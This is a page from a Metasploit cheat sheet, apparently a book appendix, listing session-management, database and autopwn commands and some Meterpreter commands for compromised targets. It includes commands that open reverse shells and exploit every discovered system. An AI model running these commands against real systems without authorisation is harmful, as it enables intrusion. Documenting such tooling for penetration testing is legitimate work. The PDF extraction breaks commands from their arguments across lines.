Cheat Sheet
277
sessions -l -v
List all available sessions and show verbose fields, such as which vulnera-
bility was used when exploiting the system.
sessions -s
script
Run a specific Meterpreter script on all Meterpreter live sessions.
sessions -K
Kill all live sessions.
sessions -c
cmd
Execute a command on all live Meterpreter sessions.
sessions -u
sessionID
Upgrade a normal Win32 shell to a Meterpreter console.
db_create
name
Create a database to use with database-driven attacks (example:
db_create
autopwn
).
db_connect
name
Create and connect to a database for driven attacks (example:
db_connect
autopwn
).
db_nmap
Use
nmap
and place results in database. (Normal
nmap
syntax is supported,
such as
–sT –v –P0
.)
db_autopwn -h
Display help for using
db_autopwn
.
db_autopwn -p -r -e
Run
db_autopwn
against all ports found, use a reverse shell, and exploit all
systems.
db_destroy
Delete the current database.
db_destroy
user:password@host:port/database
Delete database using advanced options.
Meterpreter Commands
help
Open Meterpreter usage help.
run
scriptname
Run Meterpreter-based scripts; for a full list check the
scripts/meterpreter
directory.
sysinfo
Show the system information on the compromised target.
ls
List the files and folders on the target.